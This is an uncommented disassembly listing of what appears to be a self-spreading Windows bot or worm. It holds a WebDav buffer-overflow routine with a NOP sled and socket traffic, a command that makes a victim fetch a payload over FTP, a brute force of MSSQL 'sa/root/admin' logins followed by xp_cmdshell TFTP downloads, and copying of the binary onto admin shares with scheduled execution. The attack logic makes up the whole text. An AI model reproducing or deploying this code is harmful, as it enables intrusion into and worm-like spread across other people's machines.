jz loc_413AE7
cmp eax, 1
jz loc_413AE7
cmp eax, 3
jnz short loc_413545
and dword ptr [ebp-10h], 0
jmp short loc_413559
; ---------------------------------------------------------------------------
loc_413545: ; CODE XREF: .text:0041353D�j
call sub_4145D1
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-10h], edx
loc_413559: ; CODE XREF: .text:00413543�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-58h]
push 28h
push eax
call sub_41466D
add esp, 10h
xor eax, eax
loc_413572: ; CODE XREF: .text:00413589�j
mov cl, [ebp+eax-58h]
and byte ptr [ebp+eax*2-11Fh], 0
mov [ebp+eax*2-120h], cl
inc eax
cmp eax, 28h
jl short loc_413572
push 18h
pop ecx
mov esi, offset dword_42D2D8
lea edi, [ebp-0D0h]
lea eax, [ebp-58h]
rep movsd
lea edx, [eax+1]
loc_4135A1: ; CODE XREF: .text:004135A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4135A1
sub eax, edx
mov ecx, eax
lea esi, [ebp-120h]
lea edi, [ebp-0A0h]
lea eax, [ebp-58h]
rep movsw
lea ecx, [eax+1]
loc_4135C1: ; CODE XREF: .text:004135C6�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4135C1
sub eax, ecx
lea edi, [ebp+eax*2-0A1h]
mov esi, (offset aC_5+3)
movsd
movsd
lea eax, [ebp-58h]
movsb
lea ecx, [eax+1]
loc_4135DF: ; CODE XREF: .text:004135E4�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4135DF
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp-1], al
mov [ebp-0CDh], al
lea eax, [ebp-58h]
lea ecx, [eax+1]
loc_4135FB: ; CODE XREF: .text:00413600�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4135FB
sub eax, ecx
shl al, 1
add al, 9
push 135h
mov [ebp-0A3h], al
call dword_435954 ; htons
mov ebx, [ebp-10h]
xor eax, 9999h
cmp ebx, 1
mov word_42CFD0, ax
jz short loc_4136A6
cmp ebx, 2
jz short loc_4136A6
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [ebp-12C4h]
rep stosd
mov eax, offset loc_42CF20
mov ecx, eax
lea esi, [ecx+1]
loc_41364D: ; CODE XREF: .text:00413652�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_41364D
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-1224h]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-0Ch]
rep movsb
lea ecx, [eax+1]
loc_413672: ; CODE XREF: .text:00413677�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413672
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp-0Ch]
lea edi, [ebp-0B08h]
rep movsd
mov ecx, eax
and ecx, 3
imul ebx, 3Ch
mov eax, dword_42D718[ebx]
rep movsb
mov [ebp-0B18h], eax
jmp loc_413778
; ---------------------------------------------------------------------------
loc_4136A6: ; CODE XREF: .text:0041362A�j
; .text:0041362F�j
imul ebx, 3Ch
mov edx, dword_42D718[ebx]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [ebp-18A0h]
rep stosd
mov eax, offset loc_42CF20
mov ecx, eax
mov [ebp-10BCh], edx
lea esi, [ecx+1]
loc_4136D1: ; CODE XREF: .text:004136D6�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4136D1
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp-10ACh]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov dword ptr [ebp-0D88h], 6EB06EBh
mov [ebp-0D84h], edx
lea esi, [ecx+1]
loc_413705: ; CODE XREF: .text:0041370A�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_413705
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-0D78h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_413726: ; CODE XREF: .text:00413742�j
mov cl, [ebp+eax-18A0h]
and byte ptr [ebp+eax*2-43DFh], 0
mov [ebp+eax*2-43E0h], cl
inc eax
cmp eax, 0DACh
jl short loc_413726
and byte ptr [ebp-2888h], 0
and byte ptr [ebp-2887h], 0
mov edx, 714h
mov esi, 31313131h
mov ecx, edx
mov eax, esi
lea edi, [ebp-8590h]
rep stosd
stosw
mov ecx, edx
mov eax, esi
lea edi, [ebp-64B8h]
rep stosd
stosw
loc_413778: ; CODE XREF: .text:004136A1�j
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp-2884h]
rep stosd
xor ebx, ebx
push ebx
push 1
push 2
stosb
call dword_435808 ; socket
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jz loc_413AE9
push dword ptr [ebp+12Ch]
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-30h], 2
call dword_435954 ; htons
mov [ebp-2Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43587C ; inet_addr
mov [ebp-2Ch], eax
push 10h
lea eax, [ebp-30h]
push eax
push esi
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push ebx
push 89h
push offset dword_42D0B8
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push ebx
mov ebx, 640h
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
xor edi, edi
push edi
push 0A8h
push offset dword_42D148
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
push edi
push 0DEh
push offset dword_42D1F8
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
movsx eax, byte ptr [ebp-1]
push edi
add eax, 4
push eax
lea eax, [ebp-0D0h]
push eax
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
push edi
push 68h
push offset dword_42D340
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
push edi
push 0A0h
push offset dword_42D3B0
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
cmp dword ptr [ebp-10h], 1
jz short loc_413961
cmp dword ptr [ebp-10h], 2
jz short loc_413961
push 1Fh
pop ecx
mov esi, offset dword_42D458
lea edi, [ebp-2884h]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp-12C4h]
lea edi, [ebp-2808h]
rep movsd
pop ecx
push 0
push 0CF8h
lea eax, [ebp-2884h]
mov esi, offset off_42D4D8
lea edi, [ebp-2038h]
push eax
push dword ptr [ebp-8]
rep movsd
and byte ptr [ebp-1B8Dh], 0
loc_41394A: ; CODE XREF: .text:004139FB�j
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jnz loc_413A00
loc_413959: ; CODE XREF: .text:00413A24�j
push dword ptr [ebp-8]
jmp loc_413AE1
; ---------------------------------------------------------------------------
loc_413961: ; CODE XREF: .text:004138F7�j
; .text:004138FD�j
push 1Ah
pop ecx
mov esi, offset dword_42D570
lea edi, [ebp-8590h]
rep movsd
mov ecx, 6D6h
lea esi, [ebp-43E0h]
lea edi, [ebp-8528h]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42D5E0
lea edi, [ebp-64B8h]
rep movsd
mov ecx, 297h
lea esi, [ebp-334Ch]
lea edi, [ebp-6448h]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42D658
lea edi, [ebp-5984h]
rep movsd
mov esi, [ebp-8]
xor edi, edi
push edi
push 10FCh
lea eax, [ebp-8590h]
push eax
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_413AE0
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
push edi
push 0FDCh
lea eax, [ebp-64B8h]
push eax
push esi
jmp loc_41394A
; ---------------------------------------------------------------------------
loc_413A00: ; CODE XREF: .text:00413953�j
push 0
push ebx
lea eax, [ebp-0AF0h]
push eax
push dword ptr [ebp-8]
call dword_43577C ; recv
push 6
push 1
push 2
call dword_435808 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_413959
xor eax, eax
lea edi, [ebp-20h]
stosd
stosd
stosd
stosd
push 135h
mov word ptr [ebp-20h], 2
call dword_435954 ; htons
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43587C ; inet_addr
mov [ebp-1Ch], eax
push 10h
lea eax, [ebp-20h]
push eax
push esi
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_413A6C
push dword ptr [ebp-8]
jmp short loc_413ADA
; ---------------------------------------------------------------------------
loc_413A6C: ; CODE XREF: .text:00413A65�j
xor edi, edi
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43577C ; recv
test eax, eax
jle short loc_413AE7
push 1F4h
call ds:dword_420000 ; Sleep
push dword ptr [ebp+9Ch]
lea eax, [ebp+1Ch]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
lea eax, [ebp-2B0h]
push 190h
push eax
call sub_41466D
lea eax, [ebp-2B0h]
add esp, 14h
lea edx, [eax+1]
loc_413AB9: ; CODE XREF: .text:00413ABE�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413AB9
push edi
sub eax, edx
push eax
lea eax, [ebp-2B0h]
push eax
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_413AEE
loc_413ADA: ; CODE XREF: .text:00413A6A�j
call dword_435914 ; closesocket
loc_413AE0: ; CODE XREF: .text:004137E2�j
; .text:004137FD�j ...
push esi
loc_413AE1: ; CODE XREF: .text:0041395C�j
call dword_435914 ; closesocket
loc_413AE7: ; CODE XREF: .text:0041352B�j
; .text:00413534�j ...
xor eax, eax
loc_413AE9: ; CODE XREF: .text:004137A2�j
; .text:00413B70�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_413AEE: ; CODE XREF: .text:00413AD8�j
call dword_435914 ; closesocket
push esi
call dword_435914 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSTryingToXploi ; "[%s]: Trying to Xploit IP: %s."
lea eax, [ebp-4B0h]
push 200h
push eax
call sub_41466D
add esp, 14h
cmp [ebp+140h], edi
jnz short loc_413B4F
push edi
push dword ptr [ebp+13Ch]
lea eax, [ebp-4B0h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056BF
add esp, 14h
loc_413B4F: ; CODE XREF: .text:00413B2D�j
lea eax, [ebp-4B0h]
push eax
call sub_401EFF
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp loc_413AE9
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0E30h
push ebx
xor ebx, ebx
lea eax, [ebp-14h]
push eax
push ebx
push 1
mov [ebp-1], bl
mov dword ptr [ebp-30h], offset aSa ; "sa"
mov dword ptr [ebp-2Ch], offset aRoot ; "root"
mov dword ptr [ebp-28h], offset aAdmin ; "admin"
mov [ebp-24h], ebx
mov [ebp-1Ch], ebx
mov [ebp-0Ch], ebx
mov [ebp-10h], ebx
call dword_43582C
test ax, ax
jnz short loc_413BCE
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-14h]
call dword_4357C4
test ax, ax
jz short loc_413BD5
loc_413BCE: ; CODE XREF: .text:00413BB5�j
xor eax, eax
jmp loc_413E23
; ---------------------------------------------------------------------------
loc_413BD5: ; CODE XREF: .text:00413BCC�j
push esi
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-14h]
push 2
call dword_43582C
test ax, ax
jz short loc_413BF1
xor esi, esi
jmp loc_413E15
; ---------------------------------------------------------------------------
loc_413BF1: ; CODE XREF: .text:00413BE8�j
lea eax, [ebp-30h]
push edi
mov edi, ds:dword_420000
mov [ebp-8], eax
loc_413BFE: ; CODE XREF: .text:00413E03�j
cmp dword_42C0D8, ebx
mov [ebp-18h], ebx
jz loc_413DF2
mov eax, offset dword_42C0D8
mov esi, eax
loc_413C14: ; CODE XREF: .text:00413C8E�j
lea ecx, [ebp-1]
push ecx
push dword ptr [eax]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
push eax
lea eax, [ebp-0A30h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_414415
lea eax, [ebp-0A30h]
add esp, 1Ch
lea ecx, [eax+1]
loc_413C46: ; CODE XREF: .text:00413C4B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_413C46
push ebx
sub eax, ecx
lea ecx, [ebp-20h]
push ecx
push 400h
lea ecx, [ebp-0E30h]
push ecx
push eax
lea eax, [ebp-0A30h]
push eax
push ebx
push dword ptr [ebp-0Ch]
call dword_4358F4
cmp ax, bx
jz short loc_413C95
cmp ax, 1
jz short loc_413C95
push 1F4h
call edi ; Sleep
inc dword ptr [ebp-18h]
add esi, 4
cmp [esi], ebx
mov eax, esi
jnz short loc_413C14
jmp loc_413DF2
; ---------------------------------------------------------------------------
loc_413C95: ; CODE XREF: .text:00413C75�j
; .text:00413C7B�j
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-0Ch]
push 3
call dword_43582C
mov esi, offset byte_42BF4C
push esi
push dword ptr [ebp+8]
call sub_407D15
pop ecx
push eax
lea eax, [ebp-630h]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_414415
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_43590C
test ax, ax
jz loc_413DDE
push 1388h
call edi ; Sleep
push esi
lea eax, [ebp-630h]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell '%s'"
push eax
call sub_414415
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-230h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_414415
add esp, 18h
xor esi, esi
loc_413D16: ; CODE XREF: .text:00413D49�j
lea eax, [ebp-230h]
push eax
call sub_401FDF
test eax, eax
pop ecx
jz short loc_413D3E
push 0FFFFFFFDh
lea eax, [ebp-630h]
push eax
push dword ptr [ebp-10h]
call dword_43590C
test ax, ax
jz short loc_413D50
loc_413D3E: ; CODE XREF: .text:00413D25�j
push 1388h
call edi ; Sleep
inc esi
cmp esi, 6
jl short loc_413D16
jmp loc_413DDE
; ---------------------------------------------------------------------------
loc_413D50: ; CODE XREF: .text:00413D3C�j
mov eax, [ebp-18h]
push dword_42C0D8[eax*4]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+0Ch]
push dword ptr [ebp+12Ch]
mov dword ptr [ebp-1Ch], 1
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: (%s:%d) User: (%s/"...
lea eax, [ebp-230h]
push 200h
push eax
call sub_41466D
add esp, 20h
cmp [ebp+140h], ebx
jnz short loc_413DC0
push ebx
push dword ptr [ebp+13Ch]
lea eax, [ebp-230h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056BF
add esp, 14h
loc_413DC0: ; CODE XREF: .text:00413D9E�j
lea eax, [ebp-230h]
push eax
call sub_401EFF
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
pop ecx
loc_413DDE: ; CODE XREF: .text:00413CDD�j
; .text:00413D4B�j
push dword ptr [ebp-0Ch]
call dword_4357D0
push dword ptr [ebp-10h]
push 3
call dword_4358B8
loc_413DF2: ; CODE XREF: .text:00413C07�j
; .text:00413C90�j
mov esi, [ebp-1Ch]
cmp esi, 1
jz short loc_413E09
add dword ptr [ebp-8], 4
mov eax, [ebp-8]
cmp [eax], ebx
jnz loc_413BFE
loc_413E09: ; CODE XREF: .text:00413DF8�j
push dword ptr [ebp-0Ch]
push 2
call dword_4358B8
pop edi
loc_413E15: ; CODE XREF: .text:00413BEC�j
push dword ptr [ebp-14h]
push 1
call dword_4358B8
mov eax, esi
pop esi
loc_413E23: ; CODE XREF: .text:00413BD0�j
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E26 proc near ; CODE XREF: sub_4140A2+37�p
var_6F0 = byte ptr -6F0h
var_4E8 = byte ptr -4E8h
var_2E8 = byte ptr -2E8h
var_15D = byte ptr -15Dh
var_158 = byte ptr -158h
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_A4 = byte ptr 0ACh
arg_138 = dword ptr 140h
arg_140 = dword ptr 148h
arg_144 = dword ptr 14Ch
push ebp
mov ebp, esp
sub esp, 6F0h
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
push 8
pop ecx
xor ebx, ebx
push ebx
push [ebp+arg_0]
xor eax, eax
push [ebp+arg_4]
lea edi, [ebp+var_54]
rep stosd
lea eax, [ebp+var_54]
push eax
mov [ebp+var_40], esi
mov [ebp+var_50], 1
mov [ebp+var_44], ebx
mov [ebp+var_38], ebx
call dword_4358A8
test eax, eax
jz short loc_413E73
push 0Ah
call ds:dword_420000 ; Sleep
jmp loc_41408E
; ---------------------------------------------------------------------------
loc_413E73: ; CODE XREF: sub_413E26+3E�j
push 190h
lea eax, [ebp+var_2E8]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
mov [ebp+var_20], offset aAdminSystem32 ; "Admin$\\system32"
mov [ebp+var_1C], offset aCWinntSystem32 ; "c$\\winnt\\system32"
mov [ebp+var_18], offset aCWindowsSystem ; "c$\\windows\\system32"
mov [ebp+var_14], offset aC ; "c"
mov [ebp+var_10], offset aD ; "d"
mov [ebp+var_8], ebx
call ds:dword_4200D4 ; MultiByteToWideChar
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_435784
test eax, eax
jnz loc_41408B
cmp [ebp+var_8], ebx
jz loc_41408B
mov edi, ds:dword_4200FC
mov [ebp+var_4], ebx
mov esi, offset byte_42BF4C
loc_413EE0: ; CODE XREF: sub_413E26+14F�j
mov eax, [ebp+var_4]
push esi
push [ebp+eax*4+var_20]
lea eax, [ebp+var_158]
push [ebp+arg_8]
push offset aSSS_3 ; "%s\\%s\\%s"
push eax
call sub_414415
add esp, 14h
push ebx
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_413F8E
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 5
jnz short loc_413F6E
lea eax, [ebp+var_158]
push ebx
push eax
call sub_414D44
test eax, eax
pop ecx
pop ecx
jnz short loc_413F6E
lea eax, [ebp+var_158]
lea edx, [eax+1]
loc_413F38: ; CODE XREF: sub_413E26+117�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_413F38
sub eax, edx
mov [ebp+var_C], eax
call sub_4145D1
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_C]
push ebx
add dl, 30h
mov [ebp+eax+var_15D], dl
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_413F8E
loc_413F6E: ; CODE XREF: sub_413E26+F4�j
; sub_413E26+107�j
inc [ebp+var_4]
cmp [ebp+var_4], 5
jb loc_413EE0
cmp [ebp+var_C], ebx
jnz short loc_413F8E
push [ebp+var_8]
call dword_435840
jmp loc_41408E
; ---------------------------------------------------------------------------
loc_413F8E: ; CODE XREF: sub_413E26+E9�j
; sub_413E26+146�j ...
mov ecx, [ebp+var_8]
mov eax, [ecx]
push 3Ch
pop edi
xor edx, edx
div edi
xor edx, edx
lea edi, [ebp+var_34]
push 208h
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
xor eax, eax
stosd
stosd
stosd
stosd
lea eax, [ebp+var_6F0]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
imul edx, 0EA60h
mov [ebp+var_34], edx
call ds:dword_4200D4 ; MultiByteToWideChar
lea eax, [ebp+var_6F0]
mov [ebp+var_28], eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_4357BC
test eax, eax
jnz loc_41408B
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov edi, 420AEAh
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_41400F
mov eax, offset aNoPassword ; "(no password)"
loc_41400F: ; CODE XREF: sub_413E26+1E2�j
push eax
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_20]
mov eax, [ebp+arg_138]
push [ebp+arg_8]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_1 ; "[%s]: Exploiting IP: %s, Share: \\%s, Us"...
lea eax, [ebp+var_4E8]
push 200h
push eax
call sub_41466D
add esp, 20h
cmp [ebp+arg_144], ebx
jnz short loc_41406D
push ebx
push [ebp+arg_140]
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+arg_A4]
push eax
push [ebp+arg_C]
call sub_4056BF
add esp, 14h
loc_41406D: ; CODE XREF: sub_413E26+225�j
lea eax, [ebp+var_4E8]
push eax
call sub_401EFF
mov eax, [ebp+arg_138]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
pop ecx
loc_41408B: ; CODE XREF: sub_413E26+9D�j
; sub_413E26+A6�j ...
xor ebx, ebx
inc ebx
loc_41408E: ; CODE XREF: sub_413E26+48�j
; sub_413E26+163�j
push 1
push 1
push [ebp+arg_8]
call dword_4357E4
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_413E26 endp
; =============== S U B R O U T I N E =======================================
sub_4140A2 proc near ; CODE XREF: .text:0041423A�p
; .text:004142B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
cmp dword_42C0D8, 0
push ebx
push esi
push edi
jz short loc_4140FE
mov eax, offset dword_42C0D8
mov ebx, eax
loc_4140B5: ; CODE XREF: sub_4140A2+5A�j
sub esp, 140h
push 50h
pop ecx
mov edi, esp
push [esp+14Ch+arg_4]
lea esi, [esp+150h+arg_8]
push dword ptr [eax]
rep movsd
push [esp+154h+arg_0]
call sub_413E26
add esp, 14Ch
cmp eax, 1
jz short loc_414104
push 0C8h
call ds:dword_420000 ; Sleep
add ebx, 4
cmp dword ptr [ebx], 0
mov eax, ebx
jnz short loc_4140B5
loc_4140FE: ; CODE XREF: sub_4140A2+A�j
xor eax, eax
loc_414100: ; CODE XREF: sub_4140A2+65�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_414104: ; CODE XREF: sub_4140A2+45�j
xor eax, eax
inc eax
jmp short loc_414100
sub_4140A2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
xor ebx, ebx
lea eax, [ebp-30h]
push offset aS_6 ; "\\\\%s"
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
call sub_414415
add esp, 0Ch
push 3E8h
lea eax, [ebp-62Ch]
push eax
push 0FFFFFFFFh
lea eax, [ebp-30h]
push eax
push ebx
push ebx
call ds:dword_4200D4 ; MultiByteToWideChar
lea eax, [ebp-30h]
push eax
lea eax, [ebp-118h]
push offset aSIpc_0 ; "%s\\ipc$"
push eax
mov [ebp-40h], ebx
mov [ebp-34h], ebx
mov [ebp-4Ch], ebx
call sub_414415
add esp, 0Ch
lea eax, [ebp-118h]
mov [ebp-3Ch], eax
push ebx
mov eax, 420AEAh
push eax
push eax
lea eax, [ebp-50h]
push eax
call dword_4358A8
test eax, eax
jz short loc_4141A9
push 1
push ebx
lea eax, [ebp-118h]
push eax
call dword_4357E4
xor eax, eax
jmp loc_4142D1
; ---------------------------------------------------------------------------
loc_4141A9: ; CODE XREF: .text:00414190�j
; .text:00414271�j
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-14h]
push eax
push 0FFFFFFFFh
lea eax, [ebp-4]
push eax
push 2
push ebx
lea eax, [ebp-62Ch]
push eax
call dword_4357E8
push 1
mov [ebp-0Ch], eax
push ebx
lea eax, [ebp-118h]
push eax
call dword_4357E4
cmp [ebp-0Ch], ebx
jz short loc_4141EC
cmp dword ptr [ebp-0Ch], 0EAh
jnz short loc_414259
loc_4141EC: ; CODE XREF: .text:004141E1�j
mov eax, [ebp-4]
cmp eax, ebx
mov [ebp-10h], eax
jz short loc_41426A
cmp [ebp-14h], ebx
mov [ebp-8], ebx
jbe short loc_414259
loc_4141FE: ; CODE XREF: .text:00414257�j
mov eax, [ebp-10h]
cmp eax, ebx
jz short loc_414259
push ebx
push ebx
push 12Ch
lea ecx, [ebp-244h]
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call ds:dword_4200D8 ; WideCharToMultiByte
sub esp, 140h
push 50h
pop ecx
mov edi, esp
lea eax, [ebp-30h]
push eax
lea eax, [ebp-244h]
lea esi, [ebp+8]
push eax
rep movsd
call sub_4140A2
add esp, 148h
cmp eax, 1
jz short loc_414259
add dword ptr [ebp-10h], 4
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp eax, [ebp-14h]
jb short loc_4141FE
loc_414259: ; CODE XREF: .text:004141EA�j
; .text:004141FC�j ...
cmp [ebp-4], ebx
jz short loc_41426A
push dword ptr [ebp-4]
call dword_435840
mov [ebp-4], ebx
loc_41426A: ; CODE XREF: .text:004141F4�j
; .text:0041425C�j
cmp dword ptr [ebp-0Ch], 0EAh
jz loc_4141A9
cmp [ebp-4], ebx
jz short loc_414285
push dword ptr [ebp-4]
call dword_435840
loc_414285: ; CODE XREF: .text:0041427A�j
cmp dword ptr [ebp-0Ch], 5
jnz short loc_4142CE
cmp off_42C088, ebx
jz short loc_4142CE
mov eax, offset off_42C088
mov [ebp-8], eax
loc_41429B: ; CODE XREF: .text:004142CC�j
sub esp, 140h
push 50h
pop ecx
mov edi, esp
lea esi, [ebp+8]
rep movsd
lea ecx, [ebp-30h]
push ecx
push dword ptr [eax]
call sub_4140A2
add esp, 148h
cmp eax, 1
jz short loc_4142CE
mov eax, [ebp-8]
add eax, 4
cmp [eax], ebx
mov [ebp-8], eax
jnz short loc_41429B
loc_4142CE: ; CODE XREF: .text:00414289�j
; .text:00414291�j ...
xor eax, eax
inc eax
loc_4142D1: ; CODE XREF: .text:004141A4�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4142E0 proc near ; CODE XREF: sub_401000+5C�p
; sub_401000+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4143A4
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41430C
loc_4142FB: ; CODE XREF: sub_4142E0+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_41433D
test edi, 3
jnz short loc_4142FB
loc_41430C: ; CODE XREF: sub_4142E0+19�j
; sub_4142E0+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41430C
mov eax, [edi-4]
test al, al
jz short loc_41434C
test ah, ah
jz short loc_414347
test eax, 0FF0000h
jz short loc_414342
test eax, 0FF000000h
jnz short loc_41430C
loc_41433D: ; CODE XREF: sub_4142E0+22�j
sub edi, 1
jmp short loc_41434F
; ---------------------------------------------------------------------------
loc_414342: ; CODE XREF: sub_4142E0+54�j
sub edi, 2
jmp short loc_41434F
; ---------------------------------------------------------------------------
loc_414347: ; CODE XREF: sub_4142E0+4D�j
sub edi, 3
jmp short loc_41434F
; ---------------------------------------------------------------------------
loc_41434C: ; CODE XREF: sub_4142E0+49�j
sub edi, 4
loc_41434F: ; CODE XREF: sub_4142E0+60�j
; sub_4142E0+65�j ...
